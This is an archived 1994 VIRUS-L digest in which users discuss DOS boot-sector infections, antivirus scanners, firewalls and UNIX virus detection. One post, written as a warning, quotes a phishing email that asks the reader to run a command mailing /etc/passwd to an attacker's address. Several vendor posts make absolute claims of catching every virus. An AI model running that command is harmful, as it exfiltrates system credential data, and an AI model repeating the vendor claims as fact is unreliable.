VIRUS-L Digest Tuesday, 1 Nov 1994 Volume 7 : Issue 90 Today's Topics: Internet Staging Re: Distribution of Viruses Re: Common Virus Sources Re: Netcom distributing Viruses Re: Mail Security Re: UNIX virus detection (UNIX) Re: UNIX virus detection (UNIX) Anti-CMOS Virus Infection - HELP! (PC) Re: Help: Stuck with [GenP] virus (PC) Anti-CMOS A solution... (PC) Re: F-Prot under WinZip (PC) Promise DC200 IDE caching card problems(?) / Virus? (PC) what's the story with InVircible? (PC) Re: Monkey Virus is on our backs... (PC) F-prot freezes system. (PC) re: scitzo attack (PC) Re: Help with FORM (PC) Re: Help with possible virus (PC) Re: KOH encrypting disks (PC) Re: Monkey Virus is on our backs... (PC) Re: Looking for Dr. Solomon upgrade (PC) Re: Stealt_boot.C (PC) KOH Problem (PC) Firmware Virus Protection System For Networks (PC) Re: Stealt_boot.C (PC) WHISPER.FF - What does it do? (PC) 386-specific viruses (PC) Date Stamp (PC) New virus! "GV" (PC) Anti-CMOS infection - HELP! HELP! (PC) Where is the new version of FSHIELD? (PC) Re: ubuythis.now (PC) Re: Can a master boot record be repaired? (PC) Microsoft Anti-Virus updates (PC) re:JUNKIE VIRUS (PC) Re: Central Point Update? ---- FTP site? (PC) Re: invb601.zip - The InVircible Anti-Virus Expert System v6.01 (PC) Re: Need Help with Stoned Virus (PC) Re: Can a virus change CMOS settings??? (PC) Mc Afee validate: still used though USELESS! (PC) HELP! ANTICMOS virus (PC) Viruses & TSRs (PC) tbav - Thunderbyte anti-virus v6.26 (Complete/Windows/Optimized) (PC) i_m231b.zip - IntegrityMaster 2.31b antivirus/data integrity (PC) Sabotage, Pranks & Surveillance Survey VIRUS-L is a moderated, digested mail forum for discussing computer virus issues; comp.virus is a gatewayed and non-digested USENET counterpart. Discussions are not limited to any one hardware/software platform - diversity is welcomed. Contributions should be relevant, concise, polite, etc. (The complete set of posting guidelines is available by FTP on CORSA.UCR.EDU (IP number 138.23.166.133) or upon request.) Please sign submissions with your real name; anonymous postings will not be accepted. Information on accessing anti-virus, documentation, and back-issue archives is distributed periodically on the list. A FAQ (Frequently Asked Questions) document and all of the back-issues are available by anonymous FTP on CORSA.UCR.EDU. Administrative mail (e.g., comments, suggestions, beer recipes) should be sent to me at: krvw@ASSIST.MIL. All submissions should be sent to: VIRUS-L@Lehigh.edu. Ken van Wyk ---------------------------------------------------------------------- Date: Mon, 24 Oct 94 13:29:15 -0400 From: aisg@gate.net (Advanced Information Systems Group) Subject: Internet Staging Is there any software available to scan for viruses as they come into a Internet gateway machine? I'm looking for a product that scans all data comming in from the Internet before it is sent on to the destination within my internal network. Initially my conern is with E-mail messages that my have viruses in them. Any help would be appreaciated. John Klann AISG 1-800-780-2598 klann@advinfo.com ------------------------------ Date: Tue, 25 Oct 94 18:40:53 -0400 From: hw41652@is1e.bfu.vub.ac.be (Van Deun Dirk) Subject: Re: Distribution of Viruses jmccarty@spd.dsccc.com (Mike McCarty) writes: >I also believe, however, that there is a >certain "mystique" in writing viruses. (...) >But it does indicate that some people believe that writing >a virus is somehow "different" from writing any other program. It is. Writing a virus is a kind of test of your knowledge of the operating system, of the arcana of your computer. But I believe that the people who consider writing virusses an intellectual challenge and the people who spread virusses are not (always) the same. After all, most virusses seem to be programmed as slight variations on other ones, not from scratch, as a real 'hacker' (in the nice sense of the word) would do. If programming languages came packed with 'virus libraries', functions to make virus programming easy, like there are TSR libraries, the first group would loose interest -- their knowledge is no longer arcane. I do not know about the second group however: they seem to be happy if there is a virus around that a) writes their nom-de-plume in all bootsectors b) carries their political message c) destroys stuff in their name. - ------------------------------------------------------------------------------ Dirk van Deun hw41652@vub.ac.be - ------------------------------------------------------------------------------ ------------------------------ Date: Tue, 25 Oct 94 21:58:41 -0400 From: craigewert@delphi.com Subject: Re: Common Virus Sources Marty - While I cannot give you much, I will mention that my employer has had 2 recent (last month) infections from shrink-wrapped disks. Both times came from using pre-formatted disks without software, carrying (obviously) boot-sector viruses (virii?). I have been using Internet for about 13 months, and have never had a virus (at least, f-prot can't find any, and nothing bad has happened of which I am aware). Craig Ewert ------------------------------ Date: Wed, 26 Oct 94 09:31:24 -0400 From: "The Radio Gnome" Subject: Re: Netcom distributing Viruses >Date: Fri, 14 Oct 94 23:52:03 -0400 >From: olpopeye@ix.netcom.com (Walter Murdock) >Subject: re: Netcom Distributing Viruses >I guess next I'll read "You can have my computer when you >pry it from my cold, repetitive-strain-riddled hands." Dont' you mean 'net access'? :-) >Come on, people! Netcom isn't infecting your computers. No, but potentially abusive Netcom subscribers can write new viruses that will. >And guns aren't dangerous. Unless you do something stupid >with them. Neither are idle viruses. What guarantee can Netcom give us that any downloadable viruses will *remain* idle and unmutated? >Get real! Let's try and keep this discussion on a more >intelligent level. And try to pick an analogy that deals >with reality, not some knee-jerk anti-gun propaganda. OK, I'll try a new tack... how would you feel if Netcom made all the long distance touch tone diagnostic, technician and 'coin drop' codes available? The phone providers have enough trouble with phreakers as is, why make it more difficult for them by spreading knowledge that may be interesting, but potentially dangerous? Andy Wing (CNE) - Temple University Computer Services "A fool and his net access soon go their separate ways" ------------------------------ Date: Thu, 27 Oct 94 01:20:09 -0400 From: john@pc.xs4all.nl (Jan-Pieter Cornet) Subject: Re: Mail Security aisg@gate.net (Advanced Information Systems Group) once said: > from the internet to insure there are no viruses. Take SMTP mail for > example, > is there a secure sendmail or staging software that checks for viruses > before > forwarding it on to the receipient? > Are mail based viruses still a threat to a company connecting up to > the internet? Any advise you have would be much appreciated. Firewall packages probably come bundled with a specialised SMTP daemon that is able to filter out a few "nasties" from mail headers (like saying "From: /etc/passwd" and stuff like that). A much bigger threat, however, are incoming mails that simply say: ``hi! Would you be so kind as to help me out with something? If you could just type "mail haquer@evil.com < /etc/passwd" at the prompt, I'd be very grateful. Thanks.'' (This has happened not less than a week ago (as I write this, we oct 26). Read about it on comp.security.unix). Another mail problem, and this one actually is a virus, is the CHRISTMA or XMAS virus that probably will have another high soon on a certain type of network (I forgot whether it's VMS or IBM VM machines, anyway another true story). This "virus" consists of a script that does something nice to your terminal (display a christmas tree or something), while it mails itself to all people listed in your mail aliases file or whatever it's called on VM. You might be able to hook "grep" into the firewall to check for this particular type of mail-virus, but a much better solution is of course to educate the users. Educating your users isn't a bad idea anyway, since it can prevent your company from getting a bad image because the users are in serious needs of some clues, and showing that, too, on usenet (just look at aol.com :) Hope this helps, =====BEGIN FRACTAL-COMPRESSED SIGNATURE===== | Jan-Pieter Cornet !PGP0XA4E77CCB/KVC=1FCBE41048A009550F68867928EB8DDF | =====END FRACTAL-COMPRESSED SIGNATURE===== ;-) My v2.6 decompressor (out soon!) will expand this to a 72 minutes MPEG movie! ------------------------------ Date: Tue, 25 Oct 94 12:52:24 -0400 From: radatti@cyber.com (Pete Radatti) Subject: Re: UNIX virus detection (UNIX) > From: rickr@scripps.edu (Rick Ross) > > FOlks, > Greetings. I am new to the list and am risking asking something that may > have been asked recently. THe question is: Is anyone aware of any antivirus > software that has been developed for Unix workstations? My company is > connecting to the Internet and there is concern about importing viruses to > Unix workstations. How do other folks take precautions? Yes, there is a virus scanner for Unix called VFind. Also you should take very basic steps like installing a firewall prior to purchasing a virus scanner. Consider a virus scanner something that helps you deal with an attack and a firewall something that makes attacks much harder to do. That is not to say that a virus scanner can not be a valuable part of a firewall. I say this since you stated that you are connecting to the Internet and are concerned. Attacks over the Internet tend to be human directed more often than autonomous. Pete Radatti radatti@cyber.com CyberSoft, Inc. (Manufacturer of VFind) ------------------------------ Date: Tue, 25 Oct 94 15:37:37 -0400 From: jfl@hobbes.cca.rockwell.com (Joe Lawrence) Subject: Re: UNIX virus detection (UNIX) rickr@scripps.edu (Rick Ross) says: > Greetings. I am new to the list and am risking asking something that may >have been asked recently. THe question is: Is anyone aware of any antivirus >software that has been developed for Unix workstations? My company is >connecting to the Internet and there is concern about importing viruses to >Unix workstations. How do other folks take precautions? Viruses probably *won't* be your major concern when you connect to the Internet. Network penetration by uninvited "guests" will. You should investigate the use of a network firewall. Firewalls are special programs that run on gateway machines (Unix boxes or PCs) that connect between the internet and your site and block out unwanted intrusions. Most allow access out but none in. You should also invest in some books and research on internet security. There are a few (maybe three or four) true Unix viruses. Tools like Tripwire will help detect them, however, the best insurance is a dedicated, knowledable workstation administrator. Joe Lawrence |"All opinions are mine, not Rockwell's" Engineering Support Services | To do is to be - Nietzsche Rockwell International | To be is to do - Sarte jfl@hobbes.cca.rockwell.com | Do be do be do - Sinatra ------------------------------ Date: Mon, 24 Oct 94 14:06:44 -0400 From: hiwire@solomon.technet.sg (Lim Beng Cheng) Subject: Anti-CMOS Virus Infection - HELP! (PC) If you want to protect yourself against boot viruses of any kind, why not try FrontLine. This program complements your existing anti-virus software and FrontLine can detect and remove any boot virus - past, present and future. If you want more info, please drop me a email or drop a message in this newsgroup. FrontLine is currently the most reliable software to deal with boot viruses. - -- Lim Beng Cheng Hiwire Computer & Security Pte Ltd hiwire@solomon.technet.sg ------------------------------ Date: Mon, 24 Oct 94 14:19:49 -0400 From: hiwire@solomon.technet.sg (Lim Beng Cheng) Subject: Re: Help: Stuck with [GenP] virus (PC) : My PC seems to have been stuck with some [GenP] virus (as reported by : the Anti-virus program). I removed the virus (at least the Anti-virus : program told me so), but looks like the FAT is in damaged condition. If you want to forget about the threat from boot virus, just install FrontLine. FrontLine is your first line of defence against boot viruses - - past, present and future. When installed in your hard disk, it will detect and disinfect any virus - including stealth and polymorphic boot viruses. It complements your existing anti-virus software and saves your investment. : The problem is like this - let say I have a directory XYZ. I have copy : of my root directory under XYZ. Hence, I seem to have recursive directory : structure like: Just use any utilities such as Norton and change the attribute of XYZ from a directory to a file ie by removing the dir attribute. By the way, if you are in Singapore, we are conducting a virus seminar this 28 Oct 94. If you are interested, please call me at Tel: 5527328. Lim Beng Cheng Hiwire Computer & Security Pte Ltd hiwire@solomon.technet.sg ------------------------------ Date: Mon, 24 Oct 94 14:23:09 -0400 From: gnguyen@uclink2.berkeley.edu (George Nguyen) Subject: Anti-CMOS A solution... (PC) By a very idiotic and foolish accident I contracted the Anti-CMOS A virus onto my hard drive's master boot record. It was interesting to see that SCANV117 reports it as a GenB virus, SCAN 2.1.211 finds a GenP virus, and SCAN 2.1.212 finds the actual Anti-CMOS A. Right away, I wrote down my CMOS settings. Anyway, I remembered that the Linux HOW-TO FAQ for installing had some info about repartitioning without losing data, and I thought that might remove the MBR virus by recreating the MBR from scratch. But there was also a little blurb about an undocumented feature in DOS's FDISK utility. If FDISK is run with parameter /MBR, then the master boot record of the drive is rewritten and recreated. After I took a chance and ran this, my hard drive doesn't seem to be infected anymore, and all my data is intact, so far. The Anti-CMOS A virus seems to be gone now, and I've learned for myself of FDISK's little hidden feature. This seems to have a lot of potential. Does anyone else have any info on what else is not documented about FDISK's capabilities? George Nguyen ------------------------------ Date: Mon, 24 Oct 94 15:48:49 -0400 From: rc.casas@ix.netcom.com (Robert Casas) Subject: Re: F-Prot under WinZip (PC) mike.murphy@atlwin.com (Mike Murphy) writes: > >I need some help with F-Prot v2.14 (or any version for that matter). I >use Windows religiously and would rather not go to DOS (although I know >DOS and have used it since 1986). I use a ShareWare called WinZip v5.5 >(which I highly recommend!!) to test downloaded files. >I would rather use F-Prot to do the virus scanning in Iconized >background (not visible as a DOS session). >The problem comes with the report. When F-Prot is finished scanning, >WinZip brings up the report. There is no information. >I have read over the command switches and nothing seems to fit into that >category. >This is different with McAfee, which offers a complete and detailed >report using these switches: /nomem *.*/all/sub >To all the F-Prot gurus (Fridirk Skulason?)...PLEASE help...I would >rather use F-Prot than McAfee any day. The answer is so obvious that it is easy to overlook. Look in your WINZIP directory. You will see a WZ.PIF file. Open this file in windows' PIF EDITOR and de-select the "Close window on exit" box in the lower left corner of the main edit screen. Now, when you run F-PROT - or any other DOS based scanner from WINZIP - the DOS WINDOW will not automatically close when the program has completed execution. To close the DOS WINDOW hit ALT + ENTER, then "C", or use your mouse. Some more people should ask Niko to build support for F-PROT and TBAV into WINZIP. ------------------------------ Date: Mon, 24 Oct 94 21:41:58 +0000 From: stech@eskimo.com (Harvey Steck) Subject: Promise DC200 IDE caching card problems(?) / Virus? (PC) Anyone had problems with the Promise DC-200 caching card? I am suspicious that this card has recently started garbling apparently randomly picked filenames, but it does not affect the contents of the files(!). It is always the third character of the filename that is changed, and it is always changed by subtracting 40h from its ASCII value. Does anyone know of a virus that does this? If so, please let me know! (SCAN v117 doesn't detect it.) please send copy of reply via e-mail to: stech@eskimo.com (Harvey Steck) ------------------------------ Date: Mon, 24 Oct 94 21:23:58 -0400 From: 925741@brt.deakin.edu.au Subject: what's the story with InVircible? (PC) Greetings, I just received a flyer from a distributer of the InVircible product, unremarkable except for their enthusiasm to say things such as: "Every other product is redundant" "..other CRC integrity checkers aren't even worth a thought" and "no virus has evaded detection by InVircible om four years!" Well should I currently stop using AVTK and start using this package 'authored by a specialist in electronic warfare from the Israeli Airforce' I humbly await informed comments. ------------------------------ Date: Mon, 24 Oct 94 21:53:25 -0400 From: michael mccright Subject: Re: Monkey Virus is on our backs... (PC) Just heard of the monkey virus from a friend--detected in philly and has moved to s.c. Virus has been cleaned using updated virus detector. Does anyone have any damage reports from this virus. ------------------------------ Date: Tue, 25 Oct 94 00:47:41 -0400 From: Joshua Proschan <0004839378@mcimail.com> Subject: F-prot freezes system. (PC) I encountered a strange problem with f-prot 2.14: When I first got it, it worked without problems. Then I upgraded my system from Windows 3.11 to Windows for Workgroups 3.11, and swapped the ISA 486 motherboard for a new VL/B board (going from AMI v1 to v2.02). Now when I try to run f-prot it freezes the system, either without starting (3 times), or after the blue screen appears but before starting the check of memory (twice), or when starting to check the boot sector on D: Aside from Windows, the system runs DOS 6.20, QEMM 7.04, and Stacker 4.0. SCANV117 reports no viruses on the system, and VIRSTOP has never put out an alarm. I haven't found any other software that was affected by the change in hardware & Windows. I tried Zvi Netiv's suggestions for identifying Goldbug, and found no problems. Are there any other viruses that could be causing this problem? Any other suggestions? Joshua Proschan jproschan@mcimail.com ------------------------------ Date: Tue, 25 Oct 94 10:09:07 -0400 From: "David M. Chess" Subject: re: scitzo attack (PC) > From: denat@guid2.dnet.ge.com > I have just suffered an attack by the 'scitzo' virus. > found traces of it in several files which were not executables. Source code for a virus like the one you described has been floating around in virus-writing circles. Every time a file is opened that has an extension *other than* COM or EXE, there is a roughly 1/100 chance that the virus will append that "scitzo" text to the end. The virus infects files with COM and EXE extensions that are opened, and any files that are executed. It sets the seconds fields of timestamps to 3, as you noticed, to mark infected files. The actual source code (the version that I have seen, anyway) has a rather severe bug that keeps many/most offspring from running, but it appears that at least one person has fixed the bug and released a working version on the world... DC ------------------------------ Date: Tue, 25 Oct 94 10:28:40 -0400 From: rreymond@VNET.IBM.COM Subject: Re: Help with FORM (PC) Hi all, Michael Paget wrote: > An aquaintance of mine is currently tracking down an infection of the >FORM virus in the computer system of a large corporation. We have >sucsessfully removed it several times, but re-infection continues on an >irregular basis. Sigh... as perhaps you yet know, FORM is a boot sector infector; that means that the only way you have to got the vir is to boot from an infected diskette. If you have removed the virus several times, and still the infection returns time by time, this is due to someone at your site that still uses infected diskette, and that sometimes forget one into A: drive, so that when rebooting s/he again infect the PC, and then all the diskette s/he uses... After the Hard Disk cleaning, you must do a broad diskette-hunt... .......................................=8-)..Bye| ..................................................Roberto - ----------------------------------------------------------------------- * All the above are my own opinions, not necessarily shared by IBM * *********************************************************************** Roberto Reymond IBM PSP - Computer Emergency Response Team Italy RREYMOND@VNET.IBM.COM Circonvall. Idroscalo RREYMOND at VNET --- * --- 20090 Segrate (MI) ITIBM99K@IBMMAIL.COM MI SEG 526 ITALY .........Phone +39.2.596.25244 Fax +39.2.596.29587.............. *********************************************************************** * " Another one bites the dust| " , Queen (The Game, 1980) * *********************************************************************** ------------------------------ Date: Tue, 25 Oct 94 10:46:35 -0400 From: rreymond@VNET.IBM.COM Subject: Re: Help with possible virus (PC) Hi, "Sean D. Canady (USF)" wrote: >I messed up and rebooted my computer with a disk in the floppy and it >gave my the Forms Virus...I got rid of it using Norton Anti Virus, but >now when I try to run Windows for Workgroups 3.11 it tells me that it >can't find the driver for 32bit access. And it says (i think this is >right) the interupt it uses to call my hard drive is not the same. It >then tells me to check to make sure I don't have any viruses. I have >checked my entire hard drive and it doesn't come up with anything. >Also I am running Stacker 4.0, could this be part of the problem? I'm not sure, but I think may be. FORM is a boot sector virus, that means that it gain the PC control when loaded and executed, the first time from an infec- ted floppy. But, since you have Stacker installed, at that time there was the hard disk (C:) seen as physical, not logical.... I try to better explain: when working with stacker, you see a *big* C: drive, nearly the double of your physical drive. That's in reality an huge hidden file, that Stacker points as C: drive, while the rest of your hard disk is seen as another drive letter, let's say D:. At boot time, Stacker drives aren't yet loaded and operative, so there's nothing that can see this big file as an hard disk, in fact it isn't. So, FORM goes and write itself in boot sector, and the rest of the body, plus the original boot sect in the two last clusters of the disk. I don't know what FORM can do versus Stacker 4.0, in writing on the boot sector, but if the disk is quite filled, it's easy that, copying the boot sec. and its 'tail', there may be some data loss... ........................................=8-)..Bye| ..................................................Roberto - ----------------------------------------------------------------------- * All the above are my own opinions, not necessarily shared by IBM * *********************************************************************** Roberto Reymond IBM PSP - Computer Emergency Response Team Italy RREYMOND@VNET.IBM.COM Circonvall. Idroscalo RREYMOND at VNET --- * --- 20090 Segrate (MI) ITIBM99K@IBMMAIL.COM MI SEG 526 ITALY .........Phone +39.2.596.25244 Fax +39.2.596.29587.............. *********************************************************************** * " Another one bites the dust| " , Queen (The Game, 1980) * *********************************************************************** ------------------------------ Date: Tue, 25 Oct 94 11:03:19 -0400 From: rreymond@VNET.IBM.COM Subject: Re: KOH encrypting disks (PC) Hi, about virus KOH, ANTHONY APPLEYARD wrote: > If it encrypts my hard disk, or does anything else to my PC, without my >permission, it ain't useful!!! If I want an encrypter, I'll buy or write an >encrypter of the ordinary non-viral type! I agree. But, to tell the truth, KOH waits for your permission. At least, the version (1.01... or 1.1?) I've seen a while ago. The only prob I found in it was that, after being installed on an hard disk, it automatically infect every floppy used, as default. You have to switch off this with proper command. .......................................=8-)..Bye| ..................................................Roberto - ----------------------------------------------------------------------- * All the above are my own opinions, not necessarily shared by IBM * *********************************************************************** Roberto Reymond IBM PSP - Computer Emergency Response Team Italy RREYMOND@VNET.IBM.COM Circonvall. Idroscalo RREYMOND at VNET --- * --- 20090 Segrate (MI) ITIBM99K@IBMMAIL.COM MI SEG 526 ITALY .........Phone +39.2.596.25244 Fax +39.2.596.29587.............. *********************************************************************** * " Another one bites the dust| " , Queen (The Game, 1980) * *********************************************************************** ------------------------------ Date: Tue, 25 Oct 94 12:53:17 -0400 From: hiwire@solomon.technet.sg (Lim Beng Cheng) Subject: Re: Monkey Virus is on our backs... (PC) : We have an infestation of Monkey around our campus. It is : cropping up on all sorts of systems in different disciplines. : Have used McAfee to clean the virus successfully on a network, : but the virus seems to be very persistent on stand-alone : systems. Monkey virus is a stealth boot virus which infects the partition record of the hard disk. It does not infect files in the network. I wonder what you mean that you have clean the virus on a network. : We ran the cleaner and the virus was removed from one system, : but then I decided to run a check using NU8, diskedit on the : virus signature. The signature was still present on the hard You cannot remove the virus by booting up from the hard disk because it is a stealth version. You will also not be able to see the virus using any utilities. However, I have written a program called FRONTLINE. It is specifically designed to detect and remove boot virus of any kind, including stealth and polymorphic boot viruses - past, present and future. There is no need to update FRONTLINE because it is a generic virus detector. Just install into your hard disk and you can totally forget about the threat of boot viruses. The moment you switch on you PC and boot up from the hard disk, if there is a boot virus, it will be detected and removed automatically. The user just have to type Y in response to "Remove suspected boot virus (Y/N)?". FRONTLINE is the most reliable software solution to your boot viruses problem - don't even need a system disk to recover from an infection. Moreover, it saves your investment in your existing anti-virus software. FRONTLINE complements your anti-virus software. Please email me for details if you are interested to test it out. Lim Beng Cheng Hiwire Computer & Security Pte Ltd hiwire@solomon.technet.sg ------------------------------ Date: Tue, 25 Oct 94 16:34:56 -0400 From: gcluley@sands.co.uk Subject: Re: Looking for Dr. Solomon upgrade (PC) bfbrown@teal.csn.org (Brian Brown) wrote: >In its on-line-help, Dr. Solomon's indicates upgrades are available >via a bulletin board. Does such a board or FTP site exist? Can >someone point me in the right direction? S&S International in the UK operate a BBS: +44 (0)1296 318810. We are also planning to setup a Compuserve forum in the near future. But, you will need to upgrade the executable files (eg. the scanning engine, FINDVIRU.EXE) as well as the driver files. The engine periodically changes to cope with new virus developments. To give you an indication how things have moved on since your last update 11 months ago, we are now detecting in excess of 5100 viruses, trojans and variants. To upgrade the engine you will probably need to resubscribe. If you're based in the States a good point of contact for you is: S&S International 26315 Naccome Drive Mission Viejo CA 92691 USA Tel: 714 470 0048 Fax: 714 470 0018 email: 72714.2252@compuserve.com Compuserve: 72714,2252 >Email responses to brian@t1sys.com are appreciated I have also sent you this by email. Regards, Graham - --- Graham Cluley [gcluley@sands.co.uk] S&S International PLC Product Specialist Alton House, Gatehouse Way Dr Solomon's Anti-Virus Toolkit Aylesbury, Bucks HP19 3XU Tel: +44 (0)1296 318700 United Kingdom ------------------------------ Date: Tue, 25 Oct 94 17:48:20 -0400 From: bhayes@unl.edu Subject: Re: Stealt_boot.C (PC) A department here just reported a Stealth_boot.C infestation. It was detected initially with an IBM anti-virus product and F-PROT 2.14. I've not been able to find any information about this virus through F-PROT's virus listings. Can anyone tell me more about the virus? BTW, I've been trying for ages to find a good virus database. I have older listings of the Computer Virus Catalog indices, but I've had bad luck in trying to download an update from ftp.infomratik.hamburg.de. Are there other sites for this valuable set of indices? If not, what other databases are really good. I do know there's a hypertext one that's supposed to be awful. Bill Hayes, ICCS Computer Labs Supervisor, University of Nebraksa - Lincoln, Lincoln NE 68583 bhayes@unl.edu, ianr012@unlvm.unl.edu ------------------------------ Date: Tue, 25 Oct 94 22:50:19 -0400 From: Pietro Subject: KOH Problem (PC) I have a small problem--at school, someone installed KOH on a library computer, claiming it to be the "ultimate" encryption program (he was encrypting the harddrive because students were messing around with it and causing a lot of problems) However, something happened (what, I'm not exactly sure) and KOH will not let the computer to boot up properly. The computer says "Enter Passphrase", and after we do, it says "Loading MS-DOS" (everything normal so far). After that, however, it says there's an error reading the harddrive. So far, it's already encrypted 3 floopy disks (a teacher unknowingly used the computer) and there seems no way to get rid of KOH (short of re-formatting the C drive). Is there any way to expunge KOH out of the system??? Pietro ------------------------------ Date: Tue, 25 Oct 94 23:58:45 -0400 From: emd@access.digex.net (EMD Enterprises) Subject: Firmware Virus Protection System For Networks (PC) --ROMArmor Provides Seamless Anti-Virus Protection-- Towson, MD, October 17, 1994 -- EMD Enterprises announces its new line of anti-virus Firmware product called ROMArmor. ROMArmor is an 8k ROM chip that plugs into existing boot PROM sockets on network interface cards. ROMArmor's heuristic algorithm detects the presence of a virus based on its behavior and thus it can protect the system against known and unknown boot viruses. All boot viruses that are known are identified at the time of detection and the user is presented with options for either halting the boot process or repairing the boot sector. Currently EMD Enterprises is working with Ethernet adapter vendors that will begin shipping ROMArmor enabled products. ROMArmor comes with free access to the EMD Enterprises Windows BBS, 3 year limited warranty, 1 year free technical support and a 1 year subscription to the EMD System Care virus update service. How ROMArmor Prevents And Eliminates Boot Viruses ROMArmor prevents the most feared of computer viruses, the boot virus. ROMArmor prevents infection by installing itself as an extended BIOS before the system accesses the boot and master boot record (MBR) of the system disk. With ROMArmor activated in the system, the presence of any boot viruses hiding within the MBR and boot sector will be detected. Because boot viruses are difficult to detect and prevent, they are a large part of the reported virus infections. Boot viruses most common method of entry is when the user accidentally boots the computer from an infected floppy disk or uses a floppy disk infected by one of the common boot viruses such as FORM, Stoned or Michelangelo. ROMArmor detects these boot viruses and suspends the boot process thus allowing the user to remove the virus with additional utilities that are included with the ROMArmor package. ROMArmor incorporates special algorithms designed to reduce the occurrence of false alarms. ROMArmor is field upgradeable via software to incorporate new virus information. ROMArmor is constructed from an ordinary low cost ROM chip. By utilizing an ordinary ROM chip, EMD Enterprises eliminates the need for using expensive Flash ROM technology. ROMArmor is compatible with all IBM PC, AT, 386, 486, Pentium, or IBM compatible systems. ROMArmor is operating system independent, BIOS independent, disk independent, LAN independent, and MS-Windows aware. For more information please contact EMD Enterprises 606 Baltimore Ave., Suite 205 Towson, MD 21204, U.S.A. Phone: (410) 583-1575 ext. 3020 FAX: (410) 583-1537 EMD FAX Back: (410) 583-1575 Ext. 4 Request Document # 1025 EMD Enterprises BBS: (410) 583-1537 CompuServe E-Mail: 70473,3260, Internet: emd@access.digex.net. ------------------------------ Date: Tue, 25 Oct 94 23:59:38 -0400 From: IANR012@UNLVM.UNL.EDU (Bill Hayes) Subject: Re: Stealt_boot.C (PC) yury@casbah.acns.nwu.edu (Yury Krongauz) writes: > >Hi, >I had some diskettes diagnosed to have Stealt_boot.C by f-prot. I >cleaned and reformatted all the diskettes except one, but the virus >was not found on the hard drive (Using msav,f-prot). >Could you please give me some advice of what steps I should take to >make sure that everything is ok and hard drive is really clean. >Also, I understood that it's a bsv virus. How does it work, and what >are the symptoms - any help would be greatly appreciated. > > Yury Krongauz > We just saw Stealth_Boot.C for the first time. F-Prot 2.14 took it out. However, I haven't heard of this virus before. Can anyone provide info on it? Also, are the virus catalogs from ftp.informatik.hamburg.de up to date? The MS-DOS indices I have are dated. I've had trouble downloading from this site (I may have the address wrong in this message), as I always seem to time-out in the middle of a transfer. Are there any fast mirrors for this site and/or any other virus catalogs which are kept up-to-date? Best wishes, Bill... - ----- Bill Hayes, Computer Labs Supervisor, IANR Communications & Computing Services 201 Miller Hall, University of Nebraska-Lincoln, Lincoln, NE 68583-0713 Internet: bhayes@unl.edu, ianr012@unlvm.unl.edu, CompuServe: 75140,2265 Fax: 402-472-6362, 402-472-5639, Voice: 402-472-0813, 402-472-5630 ------------------------------ Date: Wed, 26 Oct 94 00:11:49 -0400 From: shoffman@iastate.edu (Scot A Hoffman) Subject: WHISPER.FF - What does it do? (PC) I just contracted WHISPER.FF and got rid of it with McAfee 212. Can someone tell me what it does? McAfee used to provide a text file with a chart of the virus' and what they did. Is this available anymore? Scot - -- Scot Hoffman shoffman@iastate.edu ------------------------------ Date: Wed, 26 Oct 94 09:58:13 -0400 From: mw@spinfo.uni-koeln.de (Markus Wischerath) Subject: 386-specific viruses (PC) Hi there, I'm looking for information on DOS-based viruses using 386 opcodes. AFAIK, there are at least two of them, Evolution and Argyle. I don't know if these two are related. Are there any others? Are they in the wild? Are they likely to become widespread at all, considering there's still a lot of =<286 machines around? Or do these viruses have a 16bit "kernel" so that they will spread on any machine, while the 32bit stuff is only used for maximum efficiency and additional tricks if a 386+ is present? Any comments welcome. - -- Markus Wischerath mw@spinfo.uni-koeln.de +49 221-470-4170 System Administrator Fax +49 221-470-5193 Linguistic Data Processing University of Cologne, Germany *300:c2 30 f4 ff 00 f4 c2 a9 a2 05 0f 22 00 00 e1 e2 30 60 n 300g ------------------------------ Date: Wed, 26 Oct 94 10:24:41 -0400 From: sean.doherty@channel1.com (Sean Doherty) Subject: Date Stamp (PC) I recently installed McAfee's Virusan v2.1.1 onto our Novell network. I scanned all 3.5GB of our Netware v3.11 network and to my horror found that many the date stamps on files ending in EXE, COM, BIN, DLL, SYS and OVL were changed by eight months! As you know, this is a major problem when trying to determine which version of a program youy have. There was not way to find out which files had been changed and which had not. We discovered the erroneous dates when files began listing creating dates of "00". By comparing these files with the copied on our recent back tape I found that the files with months of "00" should really have had dates on "08". Since there was no way to determine which files had their date stamps changed anmd which were okay (besides comparing the dates of 3.5GB worth of files to the same files on a backup tape) I restored all of the files with these extensions. I also scanend all of our workstations for viruses using the McAfee software (another copy), Norton Antivirus, and MS Antivirus (w/ MSDOS 6.20). I found no viruses. It's been five days since I restored the files and stopped using Viruscan and all is well. I would like to begin using the McAfee software again, as I've had nothing but success until now. The command line I used was "SCAN F: G: /PLAD". I beleive the /PLAD (Preserve Last Access Date) parameter screwed up the dates, but I'm only guessing. Has anyone else had this problem? I've not seen any messages even similiar. I would appreciate any responses (especially from McAfee). Many thanks to all who read this plea for help ... :-( Sean ------------------------------ Date: Wed, 26 Oct 94 12:45:24 -0400 From: rauh@ime.usp.br Subject: New virus! "GV" (PC) Hello, I have been recently infected by a new local virus (I am from Brazil). This virus is widespreading a with no difficulty in hte country since all anti-virus programs used here are foreign and do not detect this virus. THe virus has infected so many computers that some newspaper articles have been published about it. As to this day I believe it hasn't leaved the country, and I know of no AV that detects/removes it. Simptoms: A message like: Your computer is infected since . & ! GV - MG. appears on the screen at a seemingly random but very frequent period (about 2 lines per second) when some text program is run. It seems that there exists some variants with different names that are printed. What is known: - - It only prints his meesage on the 21st of October. - - Infects the boot sector. - - Can be disinfected by "fdisk /MBR". - - When a computer is infected only about 4 programs may be loaded trying to load more causes a EMM386 error (if not used it halts). - - Windows will not run if DOS=UMB is present ion config.sys. - - It moves the original boot sector to another sector. Bad news: When my computer was infected I used fdisk to remove it, but that destroyed the virus, so I have no copy of it at this day. BUT I was contacted by a friend who is infected and I will try to put it in a disk. Name: Since it prints GV - MG and MG is a Brazilian state, and GV is the abreviation of a city named "Governador Valadares" that's how it's being called here. Help is needed, anyone interested in making a disinfector (or adding a string to one alreday done) please contact me. Chris rauh@ime.usp.br ------------------------------ Date: Wed, 26 Oct 94 14:38:45 -0400 From: agecon@hubcap.clemson.edu (Dexter Hawkins) Subject: Anti-CMOS infection - HELP! HELP! (PC) I have found the AntiCMOS virus on a machine in the department. After consulting news group I tried FDISK /MBR and SYS C:, but this fix did not work. The virus turns up when you scan machine with F-PROT and with the new scan V2.1.1. The machine has a compressed hard drive using MS-DOS 6.2. I can use any help available. Dexter (dexter@keowee.agecon.clemson.edu) ------------------------------ Date: Wed, 26 Oct 94 16:23:55 -0400 From: tsaiwn@csie.nctu.edu.tw (Wen-Nung Tsai) Subject: Where is the new 